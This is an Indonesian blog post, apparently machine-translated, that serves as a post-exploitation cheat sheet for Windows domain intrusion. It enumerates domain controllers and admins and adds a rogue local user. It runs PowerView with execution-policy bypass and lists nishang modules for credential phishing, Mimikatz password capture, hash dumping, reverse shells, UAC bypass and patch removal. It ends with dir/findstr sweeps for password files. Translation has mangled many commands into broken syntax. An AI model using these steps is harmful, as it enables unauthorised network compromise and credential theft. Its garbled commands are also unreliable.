informasi kontak saya
Surat[email protected]
2024-07-12
한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina
Empat situasi:
1. Pengguna lokal: pengguna
2. Pengguna administrator lokal: dinonaktifkan di versi rumah, hanya tersedia di server
3. Pengguna dalam domain
4. Administrator domain
Pengguna lokal biasa tidak dapat memperoleh informasi domain
Pengguna administrator lokal dapat langsung meningkatkan haknya kepada pengguna sistem (pengguna dalam domain) dan memperoleh informasi di dalam domain.
1. Tentukan apakah domain tersebut ada:
1. Periksa domain: ipconfig/all atau systeminfo atau net config workstation
ipconfig /all: Domain yang ditemukan: hack.com
systeminfo: Domain yang ditemukan adalah: hack.com
2. Lihat host DNS domain: nama domain nslookup (hack.com)
3. Waktu bersih/domain tiga situasi
Domain ada, namun pengguna saat ini bukan pengguna domain
Sebuah domain ada dan pengguna saat ini adalah pengguna domain
Lingkungan jaringan saat ini adalah kelompok kerja dan tidak ada domain
Tampilan 1.net: Menampilkan daftar domain, daftar komputer, sumber daya bersama komputer tertentu: tampilan bersih (menampilkan daftar komputer) tampilan bersih \komputer (melihat komputer bersama yang ditentukan)
tampilan bersih /domain:nama domain (hack) (menampilkan daftar komputer)
2.net user untuk melihat pengguna lokal: net user /domain untuk melihat berapa banyak pengguna di domain tersebut
Tambahkan pengguna: nama pengguna bersih (admin) kata sandi (123)/tambahkan
3. penggunaan bersih: Hubungkan komputer atau putuskan sambungan komputer dari sumber daya bersama, tampilkan informasi koneksi komputer
4.waktu bersih: Gunakan waktu untuk menyinkronkan komputer atau domain: waktu bersih \waktu bersih komputer /domain
5.net start: Memulai layanan, atau menampilkan layanan yang dimulai: layanan mulai net
6.net jeda: Jeda layanan yang sedang berjalan: layanan jeda bersih
7.net lanjutkan: Aktifkan kembali layanan: layanan lanjutkan bersih
8.net stop: Hentikan layanan Windows NT/2000/2003: layanan net stop
9.net share: menghapus, membuat, atau menampilkan sumber daya bersama
Sesi 10.net: Daftar atau putuskan sesi komputer lokal dan klien yang terhubung dengannya:
net session //komputer (mengidentifikasi komputer yang akan didaftar atau sesi)
net session //hapus komputer (putuskan sambungan sesi komputer yang ditentukan)
11.net localgroup Lihat grup komputer (hanya berlaku untuk lokal): nama pengguna grup lokal bersih
Pengguna domain: nama pengguna/domain grup lokal bersih
12.grup net menanyakan nama grup di domain (hanya berlaku untuk pengontrol domain): grup net /domain
Konfigurasi 13.net menampilkan layanan konfigurasi yang sedang berjalan, atau menampilkan dan mengubah konfigurasi layanan (secara lokal):
net config (menampilkan layanan yang sedang berjalan) net config services (menampilkan daftar layanan)
14.net komputer Menambah atau menghapus komputer dari database domain:
net computer \computername /add atau /del (menambah atau menghapus komputer ke domain login)
Jika muncul "Daftar server grup kerja ini saat ini tidak tersedia", aktifkan layanan: Server, WorkStation, Browser komputer, dan tutup firewall.
Lihat domain: ipconfig/all atau systeminfo atau net config workstation
Lihat host DNS domain: nama domain nslookup (hack.com)
Domain kueri: tampilan bersih/domain
Kueri semua komputer di domain: net view /domain:nama domain
Kueri daftar semua grup pengguna di domain: grup net /domain
Kueri daftar komputer semua anggota domain: grup net "komputer domain" /domain
Kueri informasi kata sandi di domain: akun net /domain
Dapatkan informasi kepercayaan domain: nltest /domain_trusts
Lihat nama pengontrol domain: nltest /DCLIST:hack
Lihat nama mesin, temukan IP, ping/nslookup: nama pengontrol domain ping/nslookup
Terkadang ping dinonaktifkan.
Lihat nama host pengontrol domain: nslookup ‐type=SRV _ldap._tcp
Periksa waktu saat ini: waktu bersih/domain
Lihat grup pengontrol domain: grup net "Pengontrol Domain" /domain
1. Kueri informasi pengguna di domain: pengguna bersih /domain
2. Lihat pengguna lokal: akun pengguna wmic mendapatkan nama Pengguna domain: akun pengguna wmic mendapatkan domain, nama
Pengguna lokal:
Pengguna domain:
3. Cek user yang ada : dsquery user (terkadang tidak bisa dijalankan dan hanya bisa dijalankan di mesin server)
4. Kueri grup pengguna administrator lokal: administrator grup lokal bersih
5. Permintaan pengguna administrator domain: grup bersih "admin domain" /domain
6. Kueri grup pengguna administrator domain: grup net "Admin Perusahaan" /domain
Dua alat dibutuhkan di sini
Pertama-tama unggah alat tersebut ke server dan kemudian jalankan
1.PVEFindADUser: PVEFindADUser.exe -current (perhatikan jalurnya) Alat ini dapat memeriksa pengguna mana yang telah masuk ke komputer, memungkinkan kita menemukan administrator domain
2.skrip powerView:
powershell.exe ‐exec bypass ‐perintah "& { import‐module .PowerView.ps1;Invoke‐UserHunter}"
Periksa izinnya terlebih dahulu: Get-ExecutionPolicy
Ubah kebijakan yang sedang berjalan: Set-ExecutionPolicy Unrestricted (hanya izin Tidak Terbatas yang dapat menjalankan pow)
nishang tool (link download ada di artikel sebelumnya):
Setelah ditempatkan di direktori CS, langsung impor: powershell-import nishang/nishang.psm1
Jalankan: perintah PowerShell
Beberapa perintah yang umum digunakan:
Check-VM: Periksa apakah host adalah mesin virtual
Invoke-CredentialsPhish: Menipu pengguna agar memasukkan kata sandinya
Dapatkan-WLAN-Kunci: informasi wifi
Invoke-Mimikatz: Tangkap kata sandi
Dapatkan-PassHash: Dapatkan hash
Get-PassHints: Dapatkan informasi petunjuk kata sandi pengguna
Invoke-PowerShellTcp: Shell memantul
Panggil-PsUACme: Lewati UAC
Hapus-Pembaruan: Hapus tambalan
Dapatkan-Informasi: informasi lokal
Contoh: PowerShell Check-VM
1. Kumpulkan berbagai file sensitif di direktori yang ditentukan
dir /a /s /bd:"*.txt"
dir /a /s /b C:"*.xlsx"
dir /a /s /bd:"*.md"
dir /a /s /bd:"*.sql"
dir /a /s /bd:"*.pdf"
dir /a /s /bd:"*.docx"
dir /a /s /bd:"*.doc"
dir /a /s /bd:"*konf*"
dir /a /s /bd:"*bak*"
dir /a /s /bd:"*pwd*"
dir /a /s /bd:"*pass*"
dir /a /s /bd:"*masuk*"
dir /a /s /bd:"*pengguna*"
2. Kumpulkan berbagai kata sandi akun dari file di direktori yang ditentukan
temukan string /si lewat *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
temukan /si kata sandi pengguna *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
temukan kode /si kata sandi *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
temukan /si masuk *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pengguna *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
Contoh: dir /a /s /bd:"*.txt"